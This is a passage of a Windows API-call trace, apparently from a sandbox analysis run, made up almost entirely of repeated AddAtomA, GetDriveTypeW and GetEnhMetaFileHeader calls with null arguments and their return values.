AddAtomA (lpString=0x0) returned 0x0 [0093.287] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.288] AddAtomA (lpString=0x0) returned 0x0 [0093.288] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.288] AddAtomA (lpString=0x0) returned 0x0 [0093.288] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.288] AddAtomA (lpString=0x0) returned 0x0 [0093.288] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.288] AddAtomA (lpString=0x0) returned 0x0 [0093.288] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.288] AddAtomA (lpString=0x0) returned 0x0 [0093.288] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.288] AddAtomA (lpString=0x0) returned 0x0 [0093.288] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.288] AddAtomA (lpString=0x0) 
returned 0x0 [0093.288] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.288] AddAtomA (lpString=0x0) returned 0x0 [0093.288] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.288] AddAtomA (lpString=0x0) returned 0x0 [0093.288] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.288] AddAtomA (lpString=0x0) returned 0x0 [0093.288] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.288] AddAtomA (lpString=0x0) returned 0x0 [0093.288] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.288] AddAtomA (lpString=0x0) returned 0x0 [0093.288] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.288] AddAtomA (lpString=0x0) returned 0x0 [0093.288] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.288] AddAtomA (lpString=0x0) returned 0x0 [0093.288] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.288] AddAtomA (lpString=0x0) returned 0x0 [0093.288] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.288] AddAtomA (lpString=0x0) returned 0x0 [0093.288] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.288] AddAtomA (lpString=0x0) returned 0x0 [0093.288] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.288] AddAtomA (lpString=0x0) returned 0x0 [0093.288] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.288] AddAtomA (lpString=0x0) returned 0x0 [0093.289] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.289] AddAtomA (lpString=0x0) returned 0x0 [0093.289] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.289] AddAtomA (lpString=0x0) returned 0x0 [0093.289] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.289] AddAtomA (lpString=0x0) returned 0x0 [0093.289] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.289] AddAtomA (lpString=0x0) returned 0x0 [0093.289] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.289] AddAtomA (lpString=0x0) returned 0x0 [0093.289] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.289] AddAtomA (lpString=0x0) returned 0x0 [0093.289] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0093.289] AddAtomA (lpString=0x0) returned 0x0 [0093.289] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.289] AddAtomA (lpString=0x0) returned 0x0 [0093.289] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.289] AddAtomA (lpString=0x0) returned 0x0 [0093.289] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.289] AddAtomA (lpString=0x0) returned 0x0 [0093.289] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.289] AddAtomA (lpString=0x0) returned 0x0 [0093.289] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.289] AddAtomA (lpString=0x0) returned 0x0 [0093.289] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.289] AddAtomA (lpString=0x0) returned 0x0 [0093.289] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.289] AddAtomA (lpString=0x0) returned 0x0 [0093.289] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.289] AddAtomA (lpString=0x0) returned 0x0 [0093.289] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.289] AddAtomA (lpString=0x0) returned 0x0 [0093.290] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.290] AddAtomA (lpString=0x0) returned 0x0 [0093.290] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.290] AddAtomA (lpString=0x0) returned 0x0 [0093.290] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.290] AddAtomA (lpString=0x0) returned 0x0 [0093.290] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.290] AddAtomA (lpString=0x0) returned 0x0 [0093.290] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.290] AddAtomA (lpString=0x0) returned 0x0 [0093.290] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.290] AddAtomA (lpString=0x0) returned 0x0 [0093.290] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.290] AddAtomA (lpString=0x0) returned 0x0 [0093.290] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.290] AddAtomA (lpString=0x0) returned 0x0 [0093.290] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.290] AddAtomA (lpString=0x0) returned 0x0 [0093.290] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0093.290] AddAtomA (lpString=0x0) returned 0x0 [0093.290] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.290] AddAtomA (lpString=0x0) returned 0x0 [0093.290] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.290] AddAtomA (lpString=0x0) returned 0x0 [0093.290] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.290] AddAtomA (lpString=0x0) returned 0x0 [0093.290] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.290] AddAtomA (lpString=0x0) returned 0x0 [0093.290] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.290] AddAtomA (lpString=0x0) returned 0x0 [0093.290] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.290] AddAtomA (lpString=0x0) returned 0x0 [0093.290] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.290] AddAtomA (lpString=0x0) returned 0x0 [0093.290] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.291] AddAtomA (lpString=0x0) returned 0x0 [0093.291] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.291] AddAtomA (lpString=0x0) returned 0x0 [0093.291] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.291] AddAtomA (lpString=0x0) returned 0x0 [0093.291] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.291] AddAtomA (lpString=0x0) returned 0x0 [0093.291] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.291] AddAtomA (lpString=0x0) returned 0x0 [0093.291] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.291] AddAtomA (lpString=0x0) returned 0x0 [0093.291] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.291] AddAtomA (lpString=0x0) returned 0x0 [0093.291] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.291] AddAtomA (lpString=0x0) returned 0x0 [0093.291] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.291] AddAtomA (lpString=0x0) returned 0x0 [0093.291] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.291] AddAtomA (lpString=0x0) returned 0x0 [0093.291] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.291] AddAtomA (lpString=0x0) 
returned 0x0 [0093.291] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.291] AddAtomA (lpString=0x0) returned 0x0 [0093.291] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.291] AddAtomA (lpString=0x0) returned 0x0 [0093.291] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.291] AddAtomA (lpString=0x0) returned 0x0 [0093.291] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.291] AddAtomA (lpString=0x0) returned 0x0 [0093.291] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.291] AddAtomA (lpString=0x0) returned 0x0 [0093.291] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.292] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.292] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.292] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.292] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.292] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.292] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.292] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.292] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.292] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.292] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.292] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 
lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.292] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.292] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] 
GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 
lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) 
returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, 
nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 
lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] 
GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.294] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.295] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 
